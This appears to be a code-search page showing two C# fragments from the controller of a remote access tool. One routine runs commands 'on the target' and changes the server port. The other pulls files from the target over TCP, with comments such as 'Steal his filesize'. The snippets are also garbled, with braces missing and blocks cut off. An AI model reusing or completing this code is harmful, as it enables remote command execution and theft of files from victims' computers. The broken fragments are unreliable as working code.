Example #1
 static int Execute_Command(string command, string path, NetworkStream stream,
                            TcpClient client, TcpListener listener, string ipv4) //Execute a command on the target *if returns 0 it sent a message to target
     if (command == "help")                                                      //INITIATE THE HELP FUCNTION
     else if (command.Contains("server -port -change:"))     //Change the port the server is using and notify client
         try {
             int        port = int.Parse(command[21..command.Length]);
Example #2
        public static int Download(NetworkStream stream, TcpClient client, string filename)
            //Declaration of variables
            int    bytesRead = 0; int buffer = 4096; int x = 0; int f = 0;
            string root    = Directory.GetCurrentDirectory();
            string confirm = Receive(stream, client);

            if (confirm == "FILE FOUND")
                while (x < 1)
                    string path = @root + "\\" + filename;
                    if (File.Exists(path))      //Check if file exists if so then change it bruh
                        filename = f.ToString() + filename;
                        f       += 1;
                        string fS = Receive(stream, client);               //Steal his filesize
                        Console.WriteLine("Receiving a total of " + fS + " bytes from target");
                        int    fileSize    = int.Parse(fS);                //Parse it to a int
                        byte[] bytesToRead = new byte[fileSize];           //Create a byteArray of the size of the file
                        SupportFuncLib.ProgressBar(false, true);           //Start progress bar
                        while (bytesRead < bytesToRead.Length)             //While download is going on do this stuff
                            SupportFuncLib.ProgressBar(false, false);      //Update progress bar
                            if ((bytesRead + buffer) > bytesToRead.Length) //Adjust buffer in case buffer is larger than buffer going over the wire
                                buffer = bytesToRead.Length - bytesRead;
                            stream.Read(bytesToRead, bytesRead, buffer);    //Read bytes from stream
                            //Console.WriteLine("Read " + buffer + " bytes from target");
                            bytesRead += buffer;
                        SupportFuncLib.ProgressBar(true, false);      //End progress bar
                        var fs = new FileStream(filename, FileMode.Create, FileAccess.Write);
                        fs.Write(bytesToRead, 0, bytesToRead.Length); //Write bytes to a file
                        Send(stream, "0");                            //Send confirmation message

                        x += 1;